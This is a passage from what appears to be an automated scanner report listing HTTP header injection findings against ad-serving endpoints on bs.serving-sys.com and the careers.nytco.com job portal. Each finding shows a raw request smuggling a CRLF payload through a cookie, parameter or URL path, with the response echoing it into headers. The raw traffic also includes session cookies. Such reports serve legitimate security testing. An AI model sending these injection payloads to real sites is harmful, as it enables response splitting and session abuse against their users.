GET /BurstingPipe/BannerSource.asp?FlightID=1922996&Page=&PluID=0&Pos=ff8ba%0d%0a362c533d84b HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
|
Response
HTTP/1.1 302 Object moved Connection: close Date: Sat, 13 Nov 2010 01:59:50 GMT Server: Microsoft-IIS/6.0 P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Content-type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Cache-Control: no-cache, no-store Pragma: no-cache Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHH0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_ff8ba 362c533d84b=4005086 Location: http://ds.serving-sys.com/BurstingRes/Site-2452/Type-0/10e11342-71de-4dd2-be15-f354433bed69.gif Content-Length: 0
|
2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BannerSource.asp |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 38356%0d%0a8ef6af01349 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356%0d%0a8ef6af01349; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356 8ef6af01349; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_=BlankImage Connection: close
|
2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BurstingInteractionsPipe.asp |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f1a%0d%0a2300f10199f was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a%0d%0a2300f10199f; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a 2300f10199f; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
|
2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BurstingInteractionsPipe.asp |
Issue detail
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3308a%0d%0ab7fc8e58424 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=3308a%0d%0ab7fc8e58424&wmpv=0&res=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=3308a b7fc8e58424&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
|
2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BurstingInteractionsPipe.asp |
Issue detail
The value of the res request parameter is copied into the Set-Cookie response header. The payload 1c571%0d%0ac124ed287af was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=0&res=1c571%0d%0ac124ed287af HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=1c571 c124ed287af&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
|
2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/BurstingInteractionsPipe.asp |
Issue detail
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 637d4%0d%0a49ae547a880 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=637d4%0d%0a49ae547a880&res=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=637d4 49ae547a880; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Connection: close
|
2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/adServer.bs |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload a3baa%0d%0aa106309a0a3 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa%0d%0aa106309a0a3; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa a106309a0a3; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1912
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]...
|
2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
https://careers.nytco.com |
Path: |
/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload a8150%0d%0a9885d629a2a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/a8150%0d%0a9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
|
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:00 GMT Location: https://careers.nytco.com/psc/TAM/a8150 9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyLwp6fh267CFb37d08fd519kxhjTgz!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=ibZNGO816CGmgoP+8wRDiOW9hzIWf9juKF29s4WauEjAoyGVrp0LscD5ghKu0DQKX6pY+xhT8lIghvjTkc++8/M/VES3ZdaLrnNm7pq0h2Vz3ljuB7NHtI5DQwSnEDUMyZwu4GybmH6PsHDSitdqiiEvb71ZKVC0; path=/ Content-Length: 365
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
|
2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
https://careers.nytco.com |
Path: |
/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 7fc66%0d%0a8dd5b3d6a61 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/EMPLOYEE/7fc66%0d%0a8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
|
Response
